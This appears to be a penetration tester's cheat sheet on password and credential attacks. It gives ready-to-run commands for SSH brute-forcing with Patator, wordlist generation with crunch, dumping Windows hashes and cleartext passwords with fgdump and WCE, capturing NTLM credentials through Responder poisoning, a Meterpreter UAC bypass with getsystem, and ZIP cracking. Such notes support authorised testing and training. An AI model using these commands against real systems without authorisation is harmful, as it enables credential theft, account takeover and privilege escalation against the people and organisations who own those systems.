Passwords & credentials

Wordlists and dictionaries

Online cracker

Online attacks

patator.py

Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. (GitHub: lanjelot/patator)

python -W ignore patator.py ssh_login host=<ip> user=FILE0 0=/root/usernames password=Pass.txt

Tools

identify hash

hashid <hash>
hash-identifier

Keyspace brute force

crunch

crunch 6 6 0123456789ABCDEF -o crunch1.txt

Pre-defined character set

crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha

More customized passwords

@ - Lower case alpha characters
, - Upper case alpha characters
% - Numeric characters
^ - Special characters including space

crunch 8 8 -t ,@@^^%%%

fgdump

In-memory attack (DLL injection) for system passwords

fgdump.exe
type 127.0.0.1.pwdump

Alternative: Pwdump

Windows Credentials Editor (WCE)

Windows Credentials Editor (WCE) is a security tool to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes, plaintext passwords and Kerberos tickets).

List logon sessions

wce -l

Dump clear text passwords

wce -w

responder.py (windows creds)

Responder is an LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. (GitHub: lgandx/Responder)

python ./Responder.py -i <own-ip> -b Off -r Off -w On

bypassuac

Used to bypass UAC post-exploitation: http://thehackerplaybook.com/Download/bypassuac.zip

run bypassuac
background
sessions -i 2
getsystem

Specific services, apps, files

fcrackzip

A braindead program for cracking encrypted ZIP archives. Forked from http://oldhome.schmorp.de/marc/fcrackzip.html (GitHub: hyc/fcrackzip)

fcrackzip -u -D -p <file-with-pws> file.zip
